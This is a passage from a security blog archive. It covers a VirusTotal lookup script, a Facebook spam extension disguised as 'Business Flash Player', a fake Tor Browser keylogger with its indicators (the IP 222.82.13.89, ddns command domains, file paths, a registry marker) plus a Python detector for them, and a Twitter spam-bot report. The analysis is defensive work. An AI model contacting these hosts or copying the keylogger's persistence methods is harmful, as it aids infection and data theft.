    files = [("file", inputfile, file_to_send)]
    json = postfile.post_multipart(host, selector, fields, files)
    print(json)


if __name__ == "__main__":
    main(sys.argv[1:])
</pre>
<br />
Replace 'YOUR PUBLIC API KEY' with your own key, which you can get at VirusTotal.com.<br />
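As an added example (not the post's script), the Python below talks to the same public v2 API but looks the sample's SHA-256 up with file/report before falling back to file/scan, which saves API quota and avoids uploading a file VirusTotal already knows. It uses the `requests` library instead of postfile.py for the network calls; the API key and sample path are placeholders.

```python
"""Look a sample's hash up on VirusTotal before uploading it.

Added example; it is not the post's script, though it talks to the same
public v2 API (file/report, then file/scan) using the `requests` library
instead of postfile.py. YOUR PUBLIC API KEY and the sample path are
placeholders to replace.
"""
import hashlib
import os
import sys

VT_REPORT_URL = "https://www.virustotal.com/vtapi/v2/file/report"
VT_SCAN_URL = "https://www.virustotal.com/vtapi/v2/file/scan"


def sha256_of_file(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def report_params(api_key, digest):
    """Query parameters for the v2 file/report call."""
    return {"apikey": api_key, "resource": digest}


def summarize_report(report):
    """Reduce a v2 file/report JSON object to (known, positives, total).
    response_code 1 means VirusTotal has a report; 0 means the hash is unknown."""
    if report.get("response_code") != 1:
        return (False, 0, 0)
    return (True, int(report.get("positives", 0)), int(report.get("total", 0)))


def lookup_or_upload(path, api_key, session=None):
    """Return the existing report summary, or upload the sample and return its scan_id."""
    import requests  # imported here so the pure helpers above work without it installed
    s = session or requests.Session()
    digest = sha256_of_file(path)
    r = s.get(VT_REPORT_URL, params=report_params(api_key, digest), timeout=30)
    r.raise_for_status()
    known, positives, total = summarize_report(r.json())
    if known:
        return {"action": "report", "sha256": digest, "positives": positives, "total": total}
    with open(path, "rb") as fh:
        r = s.post(VT_SCAN_URL, data={"apikey": api_key},
                   files={"file": (os.path.basename(path), fh)}, timeout=120)
    r.raise_for_status()
    return {"action": "uploaded", "sha256": digest, "scan_id": r.json().get("scan_id")}


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: vt_lookup_or_upload.py SAMPLE_PATH")
    print(lookup_or_upload(sys.argv[1], "YOUR PUBLIC API KEY"))
```

Uploading is also a disclosure: anything you send becomes visible to other VirusTotal users, so checking the hash first is the habit to build when the sample may contain a customer's data.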
<br />
~ alternat0r<br />
<h2>'Business Flash Player' appears to be a Facebook spammer</h2>
Published 2013-02-18.<br />
I just received this Facebook post from the wild, which suddenly tagged me for no known reason. It looks like a community page with 87 million user 'Likes' on it. That's something fishy to me.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggi17pjnenRONJBhw6DU5NxZTyfmYMd0W0GfFRC5mYQZz9MwLyocvueT5ZWEv7WFPNcO7DiNjwpedfxgyTko8HaPsM6WWASxeazrfMSbLGPzOt34YzdjGgX_yv8H0gZUseoLJkkhDqHJJc/s1600/fb1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggi17pjnenRONJBhw6DU5NxZTyfmYMd0W0GfFRC5mYQZz9MwLyocvueT5ZWEv7WFPNcO7DiNjwpedfxgyTko8HaPsM6WWASxeazrfMSbLGPzOt34YzdjGgX_yv8H0gZUseoLJkkhDqHJJc/s400/fb1.png" width="400" /></a></div>
<br />
This looked suspicious to me because the provided URL was unreadable. Obviously it is made of Unicode characters, an IDN. The script is Armenian (ask Google Translate or <a href="http://en.wikipedia.org/wiki/En_with_middle_hook" target="_blank">Wikipedia</a>).<br />
<br />
Well, let's check out what's so special about this FB post. Once you click on that weird URL you are redirected to fastotolike.com. The website looks like some kind of 'auto-like' or clickjacking script.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZUK5sr6uxRQgL-tpouuN7IuSfvuTuSIosjplUd6VdgAfqymgyZgw_oThvAjt66XV4IlnTaLGKhHgdT_Ea5aScTKlgMaSIfjl9O5CrzxsOzBUlxOi7IoRp0LQPBNXHywdJ2jbks4zUuGM/s1600/fastotolike.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZUK5sr6uxRQgL-tpouuN7IuSfvuTuSIosjplUd6VdgAfqymgyZgw_oThvAjt66XV4IlnTaLGKhHgdT_Ea5aScTKlgMaSIfjl9O5CrzxsOzBUlxOi7IoRp0LQPBNXHywdJ2jbks4zUuGM/s400/fastotolike.png" width="400" /></a></div>
<br />
If you click anywhere on the page you get another strange popup (I'm using Google Chrome for this test). The popup prompts you to install some kind of plug-in or extension for Chrome. According to its JavaScript, the popup opens 8 times. See image below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj35WgQjkzdRm2NkwbcfUcINTZWwpk5wAou46v3nHWjf-kN9yu2WJslplX-mklQetv_GhErhObt-laSsxUpiDtoB4le9IvG_619vlO7DBEoRBPnM8Oj6DezUdAAjfqoVh1x2KYhN5DTGLD6/s1600/fastotolike2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj35WgQjkzdRm2NkwbcfUcINTZWwpk5wAou46v3nHWjf-kN9yu2WJslplX-mklQetv_GhErhObt-laSsxUpiDtoB4le9IvG_619vlO7DBEoRBPnM8Oj6DezUdAAjfqoVh1x2KYhN5DTGLD6/s400/fastotolike2.png" width="378" /></a></div>
<br />
Looking at the source code, you will find Turkish text, hoping that the user will click the 'Add' button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3a1uyNWZoxX3OmV9QnHDA2b5Z7Jor62T4dsGHLy4AGYN70x40pjwXwrTuZMKiGsTL1CciiFyHqYTnAB0lDEoi44QvbuMQ7fU2vPNu3oqC-FFfXMjv8u_4SO3Gcl9nhUlfpX9APbhAq41u/s1600/fastotolike3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3a1uyNWZoxX3OmV9QnHDA2b5Z7Jor62T4dsGHLy4AGYN70x40pjwXwrTuZMKiGsTL1CciiFyHqYTnAB0lDEoi44QvbuMQ7fU2vPNu3oqC-FFfXMjv8u_4SO3Gcl9nhUlfpX9APbhAq41u/s400/fastotolike3.png" width="400" /></a></div>
<br />
It looks like the app is available in the Google Web Store, disguised as 'Business Flash Player !'. With no description and no screenshots, it definitely looks fishy. See image below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMAmPYzacM-IJLeILaUa3XyBoA3TI0jHEbH6QSBD6IifH433BlSc3XbQI7uLIoN0oQycrrccpW4Xa6m8e_GG_igKtK6XRnojizV0a8ZcFMq3sxZtVN5HRf3RpdHxJdUfGLgKZBQxOOmY/s1600/fastotolike4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqMAmPYzacM-IJLeILaUa3XyBoA3TI0jHEbH6QSBD6IifH433BlSc3XbQI7uLIoN0oQycrrccpW4Xa6m8e_GG_igKtK6XRnojizV0a8ZcFMq3sxZtVN5HRf3RpdHxJdUfGLgKZBQxOOmY/s400/fastotolike4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
If you try to install it, you will see the extension appear in the Chrome Extensions list.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSvd3V3T5HjnJXr7M8qXA7BMYuVi2hQVhwJHPUl2Xbxfg2OFmSULP3lJEhU0fM1ElRR4Ga0E6aPxTWXCvU0rysPCKLdG7Y_qFtS3qHD4Q6DKeDxcmFsnYI4trht1r_Q1F3ZqduS7ZQBGV-/s1600/fastotolike5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSvd3V3T5HjnJXr7M8qXA7BMYuVi2hQVhwJHPUl2Xbxfg2OFmSULP3lJEhU0fM1ElRR4Ga0E6aPxTWXCvU0rysPCKLdG7Y_qFtS3qHD4Q6DKeDxcmFsnYI4trht1r_Q1F3ZqduS7ZQBGV-/s640/fastotolike5.png" width="640" /></a></div>
<br />
Let's take a look at the installed extension's source code. There are two links, one of which redirects to a malicious website. See image below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnMthCSyRx8wauYnP3OmhJ4vubQqPnftL1wcJPUeygb3-J1jhJxQpP814PbrXebPyHbyfesXnmrWuyKgMIKHaaDqejQ5YfOOLKcoay-00jQ-2gWjbX1dwoVyt1Y93IIeobNHCgGb4DNf1b/s1600/fastotolike6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnMthCSyRx8wauYnP3OmhJ4vubQqPnftL1wcJPUeygb3-J1jhJxQpP814PbrXebPyHbyfesXnmrWuyKgMIKHaaDqejQ5YfOOLKcoay-00jQ-2gWjbX1dwoVyt1Y93IIeobNHCgGb4DNf1b/s400/fastotolike6.png" width="400" /></a></div>
<br />
The redirect URL goes to http://fastotolike.com/yeni.php, which somehow reveals its source code as one long commented-out line. So, for this test I just uncommented the JS code and beautified it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtdgPFF9iwOzhPGwfmwSjASRzDxLy1_2ofoyvuIp3vuqkNqshC8SrWIzssWJDJVqqJ0_v2xMGAVKHXUV_bPiOfYq6iUqvDxk_k3Ndx8pQxGFquUwtraMJjJPlVEfYzx1SlEPMeuqjpeQM/s1600/fastotolike7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtdgPFF9iwOzhPGwfmwSjASRzDxLy1_2ofoyvuIp3vuqkNqshC8SrWIzssWJDJVqqJ0_v2xMGAVKHXUV_bPiOfYq6iUqvDxk_k3Ndx8pQxGFquUwtraMJjJPlVEfYzx1SlEPMeuqjpeQM/s400/fastotolike7.png" width="400" /></a></div>
<br />
<br />
This script looks like it is responsible for posting spam to the victim's Facebook wall. The post appears to be submitted along with a picture of a random girl dancing on YouTube.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i1.ytimg.com/vi/4kr_LlfqEqo/mqdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i1.ytimg.com/vi/4kr_LlfqEqo/mqdefault.jpg" /></a></div>
<br />
<br />
<br />
<br />
<h2>Analysis on TOR_Browser malware</h2>
Published 2012-11-29.<br />
<span style="font-size: large;"><b>MD5: 694DD57886B32AD850224A783198D9FE, 10D52767B537B2F9F564481665B029E6, 761EA80A1C0019D6CB606BB646EBE57F</b></span>
<br />
<br />
The sample has already been circulating for a few weeks, but I still found little information about this malware on the Internet. Thus, I decided to do a quick analysis.<br />
<br />
<span style="font-size: large;"><b>Basic File Information</b></span>
<br />
<blockquote>
Received filename : Tor_Browser.exe<br />
Original Filename : suf70_launch.exe<br />
Executable vendor : Indigo Rose Corp.<br />
File size : 707,793 bytes
</blockquote>
MD5 hash received from report:<br />
<blockquote>
694DD57886B32AD850224A783198D9FE (Installer file, 707,793 bytes)<br />
10D52767B537B2F9F564481665B029E6 (Malicious PE file, 9,080 bytes)<br />
761EA80A1C0019D6CB606BB646EBE57F (Malicious PE file, 74,240 bytes)
</blockquote>
MD5 hash from official website:<br />
<blockquote>
The official installer file is about 22 MB in size while the sample is only 700 kB.
</blockquote>
<br />
<span style="font-size: large;"><b>Summary</b></span>
<br />
<br />
The sample we received is a PE installer file using the TOR Project file icon. In the installation wizard, the user will notice that no EULA appears on the screen:
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZXJ0-w0cVPnHZWSB8UITPURANZjXTQl9VrQnISePTLqjGa1hNkYL3z9YA67fn_f3sGhjboTEsAHq2tk5s1QBt_gFkIwdx94eTWP7zFGg3kl27Ih7cyQSbOMQFl59WNSCnGJcW-XdpL0/s503/tor_suspicious_EULA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="387" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZXJ0-w0cVPnHZWSB8UITPURANZjXTQl9VrQnISePTLqjGa1hNkYL3z9YA67fn_f3sGhjboTEsAHq2tk5s1QBt_gFkIwdx94eTWP7zFGg3kl27Ih7cyQSbOMQFl59WNSCnGJcW-XdpL0/s503/tor_suspicious_EULA.png" width="503" /></a></div>
<br />
The installer file is a malware dropper. After installation finishes, the malware does not execute itself automatically; it needs user interaction, either a reboot of the PC or a manual run from the Start Menu.
<br />
<br />
If the user runs it from the Start Menu, it runs from <b>C:\Program Files\Tor Browser\Tor_Browser.exe</b>. This PE file then starts another process from the following location:
<br />
<pre class="brush: shell">C:\Users\&lt;user profile&gt;\AppData\Local\Temp\explorer.exe
</pre>
It then runs the <b>%RANDOMNAME%.bat</b> dropped in the Windows temporary folder, which deletes the previous file <b>Tor_Browser.exe</b> after the process has terminated.
<br />
<br />
The running fake <b>explorer.exe</b> process performs several malicious activities, including keylogging, saving keystrokes in encrypted form, and resolving the malware author's DNS name to an IP.
<br />
<br />
The <b>explorer.exe</b> process remains resident in memory.
<br />
<br />
<span style="font-size: large;"><b>Process Activity</b></span>
<br />
<br />
Upon execution, the sample creates the following mutex:
<br />
<pre class="brush: shell">XXXXOOOO</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZtTbng6fFrwMEmrN08D0e4F9PDWUNz-i0QKveKos6OseOCCz90TS2ZutdbyYBzHFLwZXtZdUEjad1Yk9oO8jiMxHEKWBrGHJo-GqodKgUEu12JFq7so76qiKqQmaf5zuIrly8HpBQoZU/s453/tor_mutex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="453" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZtTbng6fFrwMEmrN08D0e4F9PDWUNz-i0QKveKos6OseOCCz90TS2ZutdbyYBzHFLwZXtZdUEjad1Yk9oO8jiMxHEKWBrGHJo-GqodKgUEu12JFq7so76qiKqQmaf5zuIrly8HpBQoZU/s453/tor_mutex.png" width="366" /></a></div>
<br />
This makes sure only a single instance of itself is running.
<br />
<br />
<span style="font-size: large;"><b>File & folder</b></span>
<br />
<br />
Upon installation the following files are created:
<br />
<pre class="brush: shell">C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tor Browser\
жÔØ Tor Browser.lnk
Tor_Browser.lnk
C:\Users\&lt;user profile&gt;\AppData\Roaming\Help\
CREATELINK.EXE (Legitimate file used to create a shortcut link)
iexplore.exe
IconCacheBt.DAT (Encrypted fake explorer.exe file)
IconConfig.DAT (Encrypted keylogger configuration)
C:\Program Files\Tor Browser\Tor_Browser.exe
C:\Windows\Tor Browser\uninstall.exe -- Non-malicious file
C:\Users\&lt;user profile&gt;\AppData\Local\Temp\explorer.exe</pre>
<br/>
This malware sample also creates a shortcut in the following Startup folder so that it runs at logon:
<br />
<pre class="brush: shell">C:\Users\<userprofile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</pre>
<br />
The shortcut points to the following file:
<br />
<pre class="brush: shell">C:\Users\<userprofile>\AppData\Roaming\Help\iexplore.exe</pre>
<br />
<span style="font-size: large;"><b>Windows Registry</b></span>
<br />
<br />
The malware will create the following registry key:
<br />
<pre class="brush: shell">HKCU\Software\Microsoft\Windows\DbxUpdateBT
"Mark"="ay"</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVyzHwtaJ4jN6iyV8YBzlH1L545DyVZPrFt2G97fUupy0CJlg4SUyN1XxSnjcZTkE3Y-XqjzGJJLHj6Da5KcIVtjNSdKo7lqcydMF5s2-EhSxMZEW9BG-FsjnA2leKaEZwOKcZmxTEeWc/s744/tor_regmark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVyzHwtaJ4jN6iyV8YBzlH1L545DyVZPrFt2G97fUupy0CJlg4SUyN1XxSnjcZTkE3Y-XqjzGJJLHj6Da5KcIVtjNSdKo7lqcydMF5s2-EhSxMZEW9BG-FsjnA2leKaEZwOKcZmxTEeWc/s400/tor_regmark.png" width="400" /></a></div>
<br />
NOTE: This registry key is used to mark the current machine as already infected.
<br />
The malware also reads the following registry key:
<br />
<pre class="brush: shell">HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\</pre>
and tries to read the value "~MHz", which stores the current CPU speed.
<br />
<br />
<br />
<span style="font-size: large;"><b>Keylogger Activity</b></span>
<br />
<br />
Keystrokes from user input are saved to the following file:
<br />
<pre class="brush: shell">C:\Users\<user profile>\AppData\Local\Temp\win_32.sys</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghTU8sXI9HvXeG0dc-4LMXWxcjMMWJR1Diy_wUCvmcFhHw9FwgmKSznNgQ7f88Hm-83Y7rS2X01A25myMMNXcKbmP3DeTjI8lVn2WnWxZ0eA3GCYGkdsdSCMrpxbwJoR7ig09GV_XMLn0/s569/tor_keylog1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghTU8sXI9HvXeG0dc-4LMXWxcjMMWJR1Diy_wUCvmcFhHw9FwgmKSznNgQ7f88Hm-83Y7rS2X01A25myMMNXcKbmP3DeTjI8lVn2WnWxZ0eA3GCYGkdsdSCMrpxbwJoR7ig09GV_XMLn0/s400/tor_keylog1.png" width="400" /></a></div>
<br />
All captured keystrokes are saved in encrypted form (using a compression library).
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc0YVNO-3d_2TaVZetiIQb_huRcUJVun0e575kQF6BtKCXOghhjWK_2uaI4D4HiYIQ3DLSOy1w8PutK1EOePdqIknc4SFpfAJIiKzk3EyrDf-xMreBbPY_QuU0B2MAwIx1rXlnvM66gHE/s512/tor_winsys_enc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc0YVNO-3d_2TaVZetiIQb_huRcUJVun0e575kQF6BtKCXOghhjWK_2uaI4D4HiYIQ3DLSOy1w8PutK1EOePdqIknc4SFpfAJIiKzk3EyrDf-xMreBbPY_QuU0B2MAwIx1rXlnvM66gHE/s512/tor_winsys_enc.png" width="512" /></a></div>
<br />
<span style="font-size: large;"><b>Network</b></span>
<br />
<br />
It tries to connect to the following IP:
<br />
<pre class="brush: shell">222.82.13.89:80</pre>
Domain names were found in the malware; it tries to resolve the following DNS names to IPs:
<br />
<pre class="brush: shell">mychangeip1.ddns.info
mychangeip.ddns.us
</pre>
<br />
<span style="font-size: large;"><b>Miscellaneous</b></span>
<br />
<br />
The malware sample (<b>iexplore.exe</b>) also contains an embedded digital certificate, while the fake <b>explorer.exe</b> has no digital certificate at all.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSl53BSWiBEMHcFd2q4BAXotfo5ZLMxWXAPTyxWBNs-F34lgT8wfHIyGvlsKMa3JhAUaU7ZrEHSesVwSd7L-Xw7fAc_PhoA_rQgFdfL0YsrZ9izb2agq1yZ1CXFsFsyzHbOGVyEXpD7O8/s640/tor_cert.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSl53BSWiBEMHcFd2q4BAXotfo5ZLMxWXAPTyxWBNs-F34lgT8wfHIyGvlsKMa3JhAUaU7ZrEHSesVwSd7L-Xw7fAc_PhoA_rQgFdfL0YsrZ9izb2agq1yZ1CXFsFsyzHbOGVyEXpD7O8/s400/tor_cert.png" width="400" /></a></div>
<br />
The digital certificate may have been stolen and has since been revoked.
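The indicators listed above (the mutex, the dropped files, the registry marker, the DNS names and the IP) can be turned into a host-telemetry matcher. The following Python is an added example written for this post; it is not code from the blog or from the malware. The event dictionary format and the sample events are constructed, and the Startup-folder rule flags any .lnk written there because the post does not name the shortcut.

```python
import re

# Indicators quoted from the write-up above. In the file paths, <user profile>
# stands for the per-user directory and * for any name inside one directory.
MUTEXES = {"XXXXOOOO"}
FILE_PATHS = [
    r"C:\Users\<user profile>\AppData\Local\Temp\explorer.exe",
    r"C:\Users\<user profile>\AppData\Local\Temp\win_32.sys",
    r"C:\Users\<user profile>\AppData\Roaming\Help\iexplore.exe",
    r"C:\Users\<user profile>\AppData\Roaming\Help\IconCacheBt.DAT",
    r"C:\Users\<user profile>\AppData\Roaming\Help\IconConfig.DAT",
    # The post does not name the startup shortcut, so any .lnk written to the
    # per-user Startup folder is flagged (assumption; tune for your estate).
    r"C:\Users\<user profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk",
]
REG_MARKER = (r"HKCU\Software\Microsoft\Windows\DbxUpdateBT", "Mark", "ay")
DOMAINS = {"mychangeip1.ddns.info", "mychangeip.ddns.us"}
IPS = {"222.82.13.89"}


def _path_regex(pattern):
    """Compile an indicator path with placeholders into a case-insensitive regex."""
    esc = re.escape(pattern)
    esc = esc.replace(re.escape("<user profile>"), r"[^\\]+")
    esc = esc.replace(re.escape("*"), r"[^\\]*")
    return re.compile("^" + esc + "$", re.IGNORECASE)


_FILE_RES = [_path_regex(p) for p in FILE_PATHS]


def match_event(ev):
    """Return the indicator category a telemetry event hits, or None."""
    kind = ev.get("type")
    if kind == "mutex" and ev.get("name") in MUTEXES:
        return "mutex"
    if kind == "file_create" and any(rx.match(ev.get("path", "")) for rx in _FILE_RES):
        return "file"
    if kind == "reg_set":
        key, value, data = REG_MARKER
        if (ev.get("key", "").lower() == key.lower()
                and ev.get("value") == value and ev.get("data") == data):
            return "registry"
    if kind == "dns" and ev.get("query", "").lower() in DOMAINS:
        return "dns"
    if kind == "net_connect" and ev.get("dst") in IPS:
        return "network"
    return None


def scan(events):
    """Group matching events by indicator category."""
    hits = {}
    for ev in events:
        cat = match_event(ev)
        if cat:
            hits.setdefault(cat, []).append(ev)
    return hits


def verdict(hits):
    """Call it infected when the marker key is set alongside any other indicator."""
    return "infected" if "registry" in hits and len(hits) >= 2 else "no match"


# Constructed sample telemetry (not real logs): the post's indicators mixed
# with benign noise from the same host.
SAMPLE_EVENTS = [
    {"type": "mutex", "name": "XXXXOOOO", "pid": 2816},
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Local\Temp\explorer.exe"},
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Roaming\Help\IconCacheBt.DAT"},
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tor Browser.lnk"},
    {"type": "file_create", "path": r"C:\Windows\explorer.exe"},
    {"type": "reg_set", "key": r"HKCU\Software\Microsoft\Windows\DbxUpdateBT", "value": "Mark", "data": "ay"},
    {"type": "dns", "query": "mychangeip.ddns.us"},
    {"type": "dns", "query": "www.torproject.org"},
    {"type": "net_connect", "dst": "222.82.13.89", "port": 80},
]

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for cat, evs in found.items():
        print(f"{cat}: {len(evs)} event(s)")
    print("verdict:", verdict(found))
```

The user-profile wildcard matters because the post's paths are written with a placeholder; matching on the literal `<user profile>` string would never fire on a real host. The verdict deliberately requires the registry marker plus one more category, since a single DNS query or a file named explorer.exe in Temp is weaker evidence on its own.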
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-3761833179825000142012-11-26T17:05:00.000+08:002012-11-26T19:09:22.723+08:00
Twitter Spam Bot 'Seducing' You
Well, not directly seducing you. It will mention your name on Twitter first. It has been almost a week since I started receiving several tweets that suddenly mentioned my nickname on my Twitter account. It looks suspicious when these people are not even following me. The text of the messages also has nothing to do with my interests.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixzMXXq0jkmEccu_7dMvei09Ktf_NrOjx8FHx9x8CQoFEX8XUhPU-eTWmmK47rbiPv312mi_FXDVoKaTkJnhttu7uEUum9DBbrMVffHcALKa0lgLQfXlxJvAIgjOVSDV6dqgnuuXmmH0c/s1600/twitter_spam2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixzMXXq0jkmEccu_7dMvei09Ktf_NrOjx8FHx9x8CQoFEX8XUhPU-eTWmmK47rbiPv312mi_FXDVoKaTkJnhttu7uEUum9DBbrMVffHcALKa0lgLQfXlxJvAIgjOVSDV6dqgnuuXmmH0c/s400/twitter_spam2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
By the time I wrote this blog post, those spammers were still actively tweeting and randomly mentioning people's names, sending around 20 tweets per day on average.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNu0Oc47L15CKk3GOw8zA7hvWs96ElohfPEHYdHZeW5m1lizy0XdjWTN7SDUykHvBuYpcFIXj2Qh7n7Ln13aXsF4K3cljxxwdZrxxZTcr3yJPQY91aFOip5QvJHnncrpGzM444cz9Y5SU/s1600/twitter_spam.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNu0Oc47L15CKk3GOw8zA7hvWs96ElohfPEHYdHZeW5m1lizy0XdjWTN7SDUykHvBuYpcFIXj2Qh7n7Ln13aXsF4K3cljxxwdZrxxZTcr3yJPQY91aFOip5QvJHnncrpGzM444cz9Y5SU/s400/twitter_spam.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As I post this screenshot, it is not only that one name randomly mentioning people; there are several other spammers using different names but almost the same message produced by their spam 'bot'. The <b>Virus Bulletin</b> guys also sent some screenshots regarding this Twitter spam activity. <a href="http://twitpic.com/bg0rgm">http://twitpic.com/bg0rgm</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwnCyJUfb_WYRnHBN7-eCZKqQ8nV65uQ9Jbcbaxfc9QjPskypfDJPeVHAgLgg-_IQoDKXlB1FJYlw6znpRG3wh3k2f4jMuETFcH7rChCAUX_6LBK0u9DXA1j63os74UWrHT4eZvXhCY_A/s1600/capribot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwnCyJUfb_WYRnHBN7-eCZKqQ8nV65uQ9Jbcbaxfc9QjPskypfDJPeVHAgLgg-_IQoDKXlB1FJYlw6znpRG3wh3k2f4jMuETFcH7rChCAUX_6LBK0u9DXA1j63os74UWrHT4eZvXhCY_A/s400/capribot.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Most of the spam 'bot' names start with the prefix '<b>Caprigal</b>xxx' ('x' could be a random letter or digit), but other names appear as well. Those 'random' account names really exist and always use seductive pictures to attract more people to follow them.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
